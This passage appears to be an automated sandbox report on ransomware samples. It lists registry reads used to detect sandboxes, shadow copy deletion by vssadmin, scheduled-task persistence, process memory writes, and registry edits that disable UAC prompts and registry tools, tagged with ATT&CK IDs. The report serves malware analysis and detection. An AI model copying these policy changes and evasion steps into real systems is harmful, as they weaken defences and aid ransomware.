Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	attrib.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	lurwhzlcveb.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	ajhqekm.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Trojan-Ransom.Win32.Crusis.dtk-6518ea1cc077c71291c07ddfe744ea7c8f65b6578a63f6a9e56db2af143bdd71.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Trojan-Ransom.Win32.Foreign.jxku-bf63837b5da7be5191e1c0b79a827ce8649971297f355845ae968cc44c7d9162.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	HEUR-Trojan-Ransom.Win32.GandCrypt.gen-d1996b5f2d34a9e8912542c40c8fe47b5f1545d4ae6a86d807e36fd20fd08477.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	HEUR-Trojan-Ransom.Win32.Mircop.gen-b50f64fbb72a9668bd98e0750dc0dd6eff84cd3bb439f6f3f7f665cbc039b7ca.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Trojan-Ransom.Win32.Sodin.alx-3fc734a086c8d3aba757aa147a8d46a317e47bb0372f1fb2abf0a163a5d2938b.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Trojan-Ransom.Win32.Stop.gr-7b3eb4e7cad673ac4e9d3894466a15dedd45621d116e0222209b3ab98b6677c3.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	icacls.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	HEUR-Trojan-Ransom.MSIL.Foreign.gen-5a7a7c94eed3eea9fbc9ff1a32ea3422b46496e405f90858b1b169bb60bdbac6.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Trojan-Ransom.Win32.Blocker.jzlx-61ce4f9766f5e50b03a1cc19a732253a6db9c93f76c3f1676a91c8c17f611bdd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Trojan-Ransom.Win32.Stop.gr-7b3eb4e7cad673ac4e9d3894466a15dedd45621d116e0222209b3ab98b6677c3.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Trojan-Ransom.Win32.Crusis.dzv-0df5f4794a0c890c3bef265b6c820baed2aced17fbf194149337a23ff1dc10ca.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Trojan-Ransom.Win32.DigiPog.ep-6ba69449c4bddf553abcd497349a15b5636bcf649e31c1242959d980cb0ed1cc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Trojan-Ransom.Win32.Stop.hz-0bd793b8bee39280c76f9f4dd793a147d600f9234233833a81be0d87dbf9e482.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Trojan-Ransom.Win32.Rack.itk-666a3daa2ef51e1b14e0abeddecce8ba836a27cc37781899c88a3b6f328d17e6.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Trojan-Ransom.Win32.Sodin.aak-4f3abc6a072b9e66a20dc5ee1dde6754beb1a3e175b2668fe540cca641c9969e.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	HEUR-Trojan-Ransom.Win32.Foreign.gen-ff6e9f1b64ba5d0c4994921a56321c3026f655b01614e2d16c84edd75be51b8d.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	VHO-Trojan-Ransom.Win32.GandCrypt.gen-58803c76d2fe76fd10c75d7c8393a5b002f00c6d14f14b9a748ac3efc1bc830c.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	nslookup.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	nslookup.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Trojan-Ransom.Win32.GandCrypt.jes-9cac4dfdc342e07a3feea28d56a11a2284544f7d63dbce610fe6ac0d03ac8044.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Trojan-Ransom.Win32.PolyRansom.bvxo-f744e61e2b8b28ee3cf224e200d17b4706a946e9466437da2c3ccff253da0f9f.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	tpvpyme.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Trojan-Ransom.Win32.Sodin.bi-4871bea79e651791fb79ef0bc46f61e728c41d27e7f5b8877d0958a8672f26ea.exe

Checks SCSI registry key(s) 3 TTPs 15 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

Peripheral Device Discovery

T1120

System Information Discovery

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000	taskmgr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000	taskmgr.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\FriendlyName	taskmgr.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\FriendlyName	taskmgr.exe
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	HEUR-Trojan-Ransom.Win32.JSWorm.gen-575933c6efb982050b56c2d838c878ee2aba3c89743cfcc58fdc26ab7b76a317.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A	taskmgr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A	taskmgr.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\FriendlyName	taskmgr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	HEUR-Trojan-Ransom.Win32.JSWorm.gen-575933c6efb982050b56c2d838c878ee2aba3c89743cfcc58fdc26ab7b76a317.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	HEUR-Trojan-Ransom.Win32.JSWorm.gen-575933c6efb982050b56c2d838c878ee2aba3c89743cfcc58fdc26ab7b76a317.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A	taskmgr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000	taskmgr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A	taskmgr.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\FriendlyName	taskmgr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000	taskmgr.exe

Checks processor information in registry 2 TTPs 6 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

System Information Discovery

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Trojan-Ransom.Win32.GandCrypt.jes-9cac4dfdc342e07a3feea28d56a11a2284544f7d63dbce610fe6ac0d03ac8044.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	Trojan-Ransom.Win32.GandCrypt.jes-9cac4dfdc342e07a3feea28d56a11a2284544f7d63dbce610fe6ac0d03ac8044.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier	Trojan-Ransom.Win32.GandCrypt.jes-9cac4dfdc342e07a3feea28d56a11a2284544f7d63dbce610fe6ac0d03ac8044.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	VHO-Trojan-Ransom.Win32.GandCrypt.gen-58803c76d2fe76fd10c75d7c8393a5b002f00c6d14f14b9a748ac3efc1bc830c.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	VHO-Trojan-Ransom.Win32.GandCrypt.gen-58803c76d2fe76fd10c75d7c8393a5b002f00c6d14f14b9a748ac3efc1bc830c.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier	VHO-Trojan-Ransom.Win32.GandCrypt.gen-58803c76d2fe76fd10c75d7c8393a5b002f00c6d14f14b9a748ac3efc1bc830c.exe

Interacts with shadow copies 3 TTPs 4 IoCs

Shadow copies are often targeted by ransomware to inhibit system recovery.

ransomware

File Deletion

T1070.004

Inhibit System Recovery

T1490

Direct Volume Access

T1006

pid	Process
10208	vssadmin.exe
4460	vssadmin.exe
1808	vssadmin.exe
5588	vssadmin.exe

Scheduled Task/Job: Scheduled Task 1 TTPs 2 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

pid	Process
3476	schtasks.exe
3844	schtasks.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
4728	taskmgr.exe
4728	taskmgr.exe
4728	taskmgr.exe
4728	taskmgr.exe
1676	taskmgr.exe
1676	taskmgr.exe
1676	taskmgr.exe
1676	taskmgr.exe
1676	taskmgr.exe
1676	taskmgr.exe
1676	taskmgr.exe
1676	taskmgr.exe
1676	taskmgr.exe
1676	taskmgr.exe
1676	taskmgr.exe
1676	taskmgr.exe
1676	taskmgr.exe
1676	taskmgr.exe
1676	taskmgr.exe
1676	taskmgr.exe
1676	taskmgr.exe
1676	taskmgr.exe
1676	taskmgr.exe
1676	taskmgr.exe
1676	taskmgr.exe
1676	taskmgr.exe
1676	taskmgr.exe
1676	taskmgr.exe
1676	taskmgr.exe
1676	taskmgr.exe
1676	taskmgr.exe
1676	taskmgr.exe
1676	taskmgr.exe
1676	taskmgr.exe
1676	taskmgr.exe
1676	taskmgr.exe
1676	taskmgr.exe
1676	taskmgr.exe
1676	taskmgr.exe
1676	taskmgr.exe
1676	taskmgr.exe
1676	taskmgr.exe
1676	taskmgr.exe
1676	taskmgr.exe
1676	taskmgr.exe
1676	taskmgr.exe
2016	powershell.exe
2016	powershell.exe
2016	powershell.exe
1676	taskmgr.exe
1676	taskmgr.exe
1676	taskmgr.exe
1676	taskmgr.exe
1676	taskmgr.exe
1676	taskmgr.exe
1676	taskmgr.exe
1676	taskmgr.exe
1676	taskmgr.exe
1676	taskmgr.exe
1676	taskmgr.exe
1676	taskmgr.exe
1676	taskmgr.exe
1676	taskmgr.exe
1676	taskmgr.exe

Suspicious behavior: GetForegroundWindowSpam 2 IoCs

pid	Process
1676	taskmgr.exe
3404	HEUR-Trojan-Ransom.Win32.Foreign.gen-ff6e9f1b64ba5d0c4994921a56321c3026f655b01614e2d16c84edd75be51b8d.exe

Suspicious behavior: MapViewOfSection 53 IoCs

pid	Process
3472	Sunwin.exe
3472	Sunwin.exe
3472	Sunwin.exe
3472	Sunwin.exe
3472	Sunwin.exe
3472	Sunwin.exe
3472	Sunwin.exe
3472	Sunwin.exe
3472	Sunwin.exe
3472	Sunwin.exe
3472	Sunwin.exe
3472	Sunwin.exe
3472	Sunwin.exe
3472	Sunwin.exe
3472	Sunwin.exe
3472	Sunwin.exe
3472	Sunwin.exe
3472	Sunwin.exe
3472	Sunwin.exe
3472	Sunwin.exe
3472	Sunwin.exe
3472	Sunwin.exe
4324	Trojan-Ransom.Win32.Xpan.h-10b893ca31e0e5c0c22350f66d98cefd2c5f74f65d5efe5ab137a63de2bc70ff.exe
2004	Trojan-Ransom.Win32.Crusis.dtk-6518ea1cc077c71291c07ddfe744ea7c8f65b6578a63f6a9e56db2af143bdd71.exe
3172	Trojan-Ransom.Win32.GandCrypt.jes-9cac4dfdc342e07a3feea28d56a11a2284544f7d63dbce610fe6ac0d03ac8044.exe
1776	tpvpyme.exe
1776	tpvpyme.exe
1776	tpvpyme.exe
3472	Sunwin.exe
3472	Sunwin.exe
3472	Sunwin.exe
3472	Sunwin.exe
5804	Trojan-Ransom.Win32.Crusis.dzv-0df5f4794a0c890c3bef265b6c820baed2aced17fbf194149337a23ff1dc10ca.exe
5804	Trojan-Ransom.Win32.Crusis.dzv-0df5f4794a0c890c3bef265b6c820baed2aced17fbf194149337a23ff1dc10ca.exe
5804	Trojan-Ransom.Win32.Crusis.dzv-0df5f4794a0c890c3bef265b6c820baed2aced17fbf194149337a23ff1dc10ca.exe
1396	Trojan-Ransom.Win32.Stop.hz-0bd793b8bee39280c76f9f4dd793a147d600f9234233833a81be0d87dbf9e482.exe
3472	Sunwin.exe
3472	Sunwin.exe
3472	Sunwin.exe
3472	Sunwin.exe
3472	Sunwin.exe
2304	Trojan-Ransom.Win32.Sodin.g-9fa3a004576f357b5174dd1c29ef7d13005d996d5f9fb4b86d6d978d1a4a84ae.exe
4928	HEUR-Trojan-Ransom.Win32.JSWorm.gen-575933c6efb982050b56c2d838c878ee2aba3c89743cfcc58fdc26ab7b76a317.exe
3472	Sunwin.exe
3472	Sunwin.exe
3692	Trojan-Ransom.Win32.Blocker.ckeq-ee96cebfbf4f65e11bd58a1a4b8463b48058466701282fd1ecf29742bda07828.exe
4324	Trojan-Ransom.Win32.Xpan.h-10b893ca31e0e5c0c22350f66d98cefd2c5f74f65d5efe5ab137a63de2bc70ff.exe
1776	tpvpyme.exe
4324	Trojan-Ransom.Win32.Xpan.h-10b893ca31e0e5c0c22350f66d98cefd2c5f74f65d5efe5ab137a63de2bc70ff.exe
4324	Trojan-Ransom.Win32.Xpan.h-10b893ca31e0e5c0c22350f66d98cefd2c5f74f65d5efe5ab137a63de2bc70ff.exe
4324	Trojan-Ransom.Win32.Xpan.h-10b893ca31e0e5c0c22350f66d98cefd2c5f74f65d5efe5ab137a63de2bc70ff.exe
4324	Trojan-Ransom.Win32.Xpan.h-10b893ca31e0e5c0c22350f66d98cefd2c5f74f65d5efe5ab137a63de2bc70ff.exe
4324	Trojan-Ransom.Win32.Xpan.h-10b893ca31e0e5c0c22350f66d98cefd2c5f74f65d5efe5ab137a63de2bc70ff.exe

Suspicious behavior: RenamesItself 2 IoCs

pid	Process
5804	Trojan-Ransom.Win32.Crusis.dzv-0df5f4794a0c890c3bef265b6c820baed2aced17fbf194149337a23ff1dc10ca.exe
4412	Trojan-Ransom.Win32.Rack.itk-666a3daa2ef51e1b14e0abeddecce8ba836a27cc37781899c88a3b6f328d17e6.exe

Suspicious use of AdjustPrivilegeToken 33 IoCs

description	pid	Process
Token: SeRestorePrivilege	3476	7zFM.exe
Token: 35	3476	7zFM.exe
Token: SeSecurityPrivilege	3476	7zFM.exe
Token: SeDebugPrivilege	4728	taskmgr.exe
Token: SeSystemProfilePrivilege	4728	taskmgr.exe
Token: SeCreateGlobalPrivilege	4728	taskmgr.exe
Token: SeDebugPrivilege	1676	taskmgr.exe
Token: SeSystemProfilePrivilege	1676	taskmgr.exe
Token: SeCreateGlobalPrivilege	1676	taskmgr.exe
Token: 33	4728	taskmgr.exe
Token: SeIncBasePriorityPrivilege	4728	taskmgr.exe
Token: SeDebugPrivilege	2016	powershell.exe
Token: SeDebugPrivilege	3404	HEUR-Trojan-Ransom.Win32.Foreign.gen-ff6e9f1b64ba5d0c4994921a56321c3026f655b01614e2d16c84edd75be51b8d.exe
Token: SeDebugPrivilege	2188	Trojan-Ransom.Win32.Sodin.aak-4f3abc6a072b9e66a20dc5ee1dde6754beb1a3e175b2668fe540cca641c9969e.exe
Token: SeDebugPrivilege	3564	powershell.exe
Token: SeBackupPrivilege	1172	vssvc.exe
Token: SeRestorePrivilege	1172	vssvc.exe
Token: SeAuditPrivilege	1172	vssvc.exe
Token: SeDebugPrivilege	4328	ajhqekm.exe
Token: 33	1676	taskmgr.exe
Token: SeIncBasePriorityPrivilege	1676	taskmgr.exe
Token: SeSecurityPrivilege	468	HEUR-Trojan-Ransom.MSIL.Foreign.gen-5a7a7c94eed3eea9fbc9ff1a32ea3422b46496e405f90858b1b169bb60bdbac6.exe
Token: SeDebugPrivilege	4600	Trojan-Ransom.Win32.PolyRansom.bvxo-f744e61e2b8b28ee3cf224e200d17b4706a946e9466437da2c3ccff253da0f9f.exe
Token: SeDebugPrivilege	8020	taskmgr.exe
Token: SeSystemProfilePrivilege	8020	taskmgr.exe
Token: SeCreateGlobalPrivilege	8020	taskmgr.exe
Token: 33	8020	taskmgr.exe
Token: SeIncBasePriorityPrivilege	8020	taskmgr.exe
Token: SeDebugPrivilege	9108	taskmgr.exe
Token: SeSystemProfilePrivilege	9108	taskmgr.exe
Token: SeCreateGlobalPrivilege	9108	taskmgr.exe
Token: 33	9108	taskmgr.exe
Token: SeIncBasePriorityPrivilege	9108	taskmgr.exe

Suspicious use of FindShellTrayWindow 64 IoCs

pid	Process
3476	7zFM.exe
3476	7zFM.exe
4728	taskmgr.exe
4728	taskmgr.exe
4728	taskmgr.exe
4728	taskmgr.exe
4728	taskmgr.exe
4728	taskmgr.exe
4728	taskmgr.exe
4728	taskmgr.exe
4728	taskmgr.exe
4728	taskmgr.exe
4728	taskmgr.exe
4728	taskmgr.exe
4728	taskmgr.exe
4728	taskmgr.exe
4728	taskmgr.exe
4728	taskmgr.exe
4728	taskmgr.exe
4728	taskmgr.exe
4728	taskmgr.exe
4728	taskmgr.exe
1676	taskmgr.exe
4728	taskmgr.exe
1676	taskmgr.exe
1676	taskmgr.exe
4728	taskmgr.exe
1676	taskmgr.exe
4728	taskmgr.exe
1676	taskmgr.exe
4728	taskmgr.exe
1676	taskmgr.exe
1676	taskmgr.exe
4728	taskmgr.exe
1676	taskmgr.exe
1676	taskmgr.exe
4728	taskmgr.exe
1676	taskmgr.exe
4728	taskmgr.exe
1676	taskmgr.exe
4728	taskmgr.exe
1676	taskmgr.exe
4728	taskmgr.exe
1676	taskmgr.exe
4728	taskmgr.exe
1676	taskmgr.exe
1676	taskmgr.exe
1676	taskmgr.exe
1676	taskmgr.exe
1676	taskmgr.exe
1676	taskmgr.exe
1676	taskmgr.exe
1676	taskmgr.exe
1676	taskmgr.exe
1676	taskmgr.exe
1676	taskmgr.exe
1676	taskmgr.exe
1676	taskmgr.exe
1676	taskmgr.exe
1676	taskmgr.exe
1676	taskmgr.exe
1676	taskmgr.exe
1676	taskmgr.exe
1676	taskmgr.exe

Suspicious use of SendNotifyMessage 64 IoCs

pid	Process
4728	taskmgr.exe
4728	taskmgr.exe
4728	taskmgr.exe
4728	taskmgr.exe
4728	taskmgr.exe
4728	taskmgr.exe
4728	taskmgr.exe
4728	taskmgr.exe
4728	taskmgr.exe
4728	taskmgr.exe
4728	taskmgr.exe
4728	taskmgr.exe
4728	taskmgr.exe
4728	taskmgr.exe
4728	taskmgr.exe
4728	taskmgr.exe
4728	taskmgr.exe
4728	taskmgr.exe
4728	taskmgr.exe
4728	taskmgr.exe
1676	taskmgr.exe
4728	taskmgr.exe
1676	taskmgr.exe
1676	taskmgr.exe
4728	taskmgr.exe
1676	taskmgr.exe
4728	taskmgr.exe
1676	taskmgr.exe
4728	taskmgr.exe
1676	taskmgr.exe
1676	taskmgr.exe
4728	taskmgr.exe
1676	taskmgr.exe
1676	taskmgr.exe
4728	taskmgr.exe
1676	taskmgr.exe
4728	taskmgr.exe
1676	taskmgr.exe
4728	taskmgr.exe
1676	taskmgr.exe
4728	taskmgr.exe
1676	taskmgr.exe
4728	taskmgr.exe
1676	taskmgr.exe
1676	taskmgr.exe
1676	taskmgr.exe
1676	taskmgr.exe
1676	taskmgr.exe
1676	taskmgr.exe
1676	taskmgr.exe
1676	taskmgr.exe
1676	taskmgr.exe
1676	taskmgr.exe
1676	taskmgr.exe
1676	taskmgr.exe
1676	taskmgr.exe
1676	taskmgr.exe
1676	taskmgr.exe
1676	taskmgr.exe
1676	taskmgr.exe
1676	taskmgr.exe
1676	taskmgr.exe
1676	taskmgr.exe
1676	taskmgr.exe

Suspicious use of SetWindowsHookEx 3 IoCs

pid	Process
5072	HEUR-Trojan-Ransom.Win32.Foreign.gen-ff6e9f1b64ba5d0c4994921a56321c3026f655b01614e2d16c84edd75be51b8d.exe
1776	tpvpyme.exe
1776	tpvpyme.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 4728 wrote to memory of 1676	4728	taskmgr.exe	103
PID 4728 wrote to memory of 1676	4728	taskmgr.exe	103
PID 2016 wrote to memory of 4968	2016	powershell.exe	110
PID 2016 wrote to memory of 4968	2016	powershell.exe	110
PID 4968 wrote to memory of 468	4968	cmd.exe	111
PID 4968 wrote to memory of 468	4968	cmd.exe	111
PID 4968 wrote to memory of 468	4968	cmd.exe	111
PID 4968 wrote to memory of 4904	4968	cmd.exe	112
PID 4968 wrote to memory of 4904	4968	cmd.exe	112
PID 4968 wrote to memory of 4904	4968	cmd.exe	112
PID 4968 wrote to memory of 5072	4968	cmd.exe	113
PID 4968 wrote to memory of 5072	4968	cmd.exe	113
PID 4968 wrote to memory of 5072	4968	cmd.exe	113
PID 4968 wrote to memory of 1408	4968	cmd.exe	114
PID 4968 wrote to memory of 1408	4968	cmd.exe	114
PID 4968 wrote to memory of 1408	4968	cmd.exe	114
PID 4968 wrote to memory of 4928	4968	cmd.exe	115
PID 4968 wrote to memory of 4928	4968	cmd.exe	115
PID 4968 wrote to memory of 4928	4968	cmd.exe	115
PID 4968 wrote to memory of 672	4968	cmd.exe	116
PID 4968 wrote to memory of 672	4968	cmd.exe	116
PID 4968 wrote to memory of 672	4968	cmd.exe	116
PID 4968 wrote to memory of 3936	4968	cmd.exe	117
PID 4968 wrote to memory of 3936	4968	cmd.exe	117
PID 4968 wrote to memory of 3936	4968	cmd.exe	117
PID 672 wrote to memory of 5032	672	HEUR-Trojan-Ransom.Win32.Mircop.gen-b50f64fbb72a9668bd98e0750dc0dd6eff84cd3bb439f6f3f7f665cbc039b7ca.exe	119
PID 672 wrote to memory of 5032	672	HEUR-Trojan-Ransom.Win32.Mircop.gen-b50f64fbb72a9668bd98e0750dc0dd6eff84cd3bb439f6f3f7f665cbc039b7ca.exe	119
PID 4968 wrote to memory of 3692	4968	cmd.exe	121
PID 4968 wrote to memory of 3692	4968	cmd.exe	121
PID 4968 wrote to memory of 3692	4968	cmd.exe	121
PID 4968 wrote to memory of 5020	4968	cmd.exe	122
PID 4968 wrote to memory of 5020	4968	cmd.exe	122
PID 4968 wrote to memory of 5020	4968	cmd.exe	122
PID 4904 wrote to memory of 1776	4904	HEUR-Trojan-Ransom.Win32.Blocker.vho-1c4c3554390a89ee17b678d9ccf4c424056264026854240e2a012a37b44235a1.exe	125
PID 4904 wrote to memory of 1776	4904	HEUR-Trojan-Ransom.Win32.Blocker.vho-1c4c3554390a89ee17b678d9ccf4c424056264026854240e2a012a37b44235a1.exe	125
PID 4904 wrote to memory of 1776	4904	HEUR-Trojan-Ransom.Win32.Blocker.vho-1c4c3554390a89ee17b678d9ccf4c424056264026854240e2a012a37b44235a1.exe	125
PID 5072 wrote to memory of 3404	5072	HEUR-Trojan-Ransom.Win32.Foreign.gen-ff6e9f1b64ba5d0c4994921a56321c3026f655b01614e2d16c84edd75be51b8d.exe	128
PID 5072 wrote to memory of 3404	5072	HEUR-Trojan-Ransom.Win32.Foreign.gen-ff6e9f1b64ba5d0c4994921a56321c3026f655b01614e2d16c84edd75be51b8d.exe	128
PID 5072 wrote to memory of 3404	5072	HEUR-Trojan-Ransom.Win32.Foreign.gen-ff6e9f1b64ba5d0c4994921a56321c3026f655b01614e2d16c84edd75be51b8d.exe	128
PID 4968 wrote to memory of 2004	4968	cmd.exe	129
PID 4968 wrote to memory of 2004	4968	cmd.exe	129
PID 4968 wrote to memory of 2004	4968	cmd.exe	129
PID 4968 wrote to memory of 1652	4968	cmd.exe	131
PID 4968 wrote to memory of 1652	4968	cmd.exe	131
PID 4968 wrote to memory of 1652	4968	cmd.exe	131
PID 3692 wrote to memory of 4324	3692	Trojan-Ransom.Win32.Blocker.ckeq-ee96cebfbf4f65e11bd58a1a4b8463b48058466701282fd1ecf29742bda07828.exe	182
PID 3692 wrote to memory of 4324	3692	Trojan-Ransom.Win32.Blocker.ckeq-ee96cebfbf4f65e11bd58a1a4b8463b48058466701282fd1ecf29742bda07828.exe	182
PID 3692 wrote to memory of 4324	3692	Trojan-Ransom.Win32.Blocker.ckeq-ee96cebfbf4f65e11bd58a1a4b8463b48058466701282fd1ecf29742bda07828.exe	182
PID 4968 wrote to memory of 3188	4968	cmd.exe	133
PID 4968 wrote to memory of 3188	4968	cmd.exe	133
PID 4968 wrote to memory of 3188	4968	cmd.exe	133
PID 4968 wrote to memory of 4956	4968	cmd.exe	134
PID 4968 wrote to memory of 4956	4968	cmd.exe	134
PID 4968 wrote to memory of 4956	4968	cmd.exe	134
PID 4968 wrote to memory of 3172	4968	cmd.exe	135
PID 4968 wrote to memory of 3172	4968	cmd.exe	135
PID 4968 wrote to memory of 3172	4968	cmd.exe	135
PID 4968 wrote to memory of 4600	4968	cmd.exe	136
PID 4968 wrote to memory of 4600	4968	cmd.exe	136
PID 4968 wrote to memory of 4600	4968	cmd.exe	136
PID 4968 wrote to memory of 4412	4968	cmd.exe	137
PID 4968 wrote to memory of 4412	4968	cmd.exe	137
PID 4968 wrote to memory of 4412	4968	cmd.exe	137
PID 4412 wrote to memory of 2308	4412	Trojan-Ransom.Win32.Rack.itk-666a3daa2ef51e1b14e0abeddecce8ba836a27cc37781899c88a3b6f328d17e6.exe	138

System policy modification 1 TTPs 38 IoCs

Modify Registry

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\FilterAdministratorToken = "0"	ajhqekm.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableVirtualization = "0"	ajhqekm.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0"	ajhqekm.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools = "1"	lurwhzlcveb.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools = "1"	ajhqekm.exe
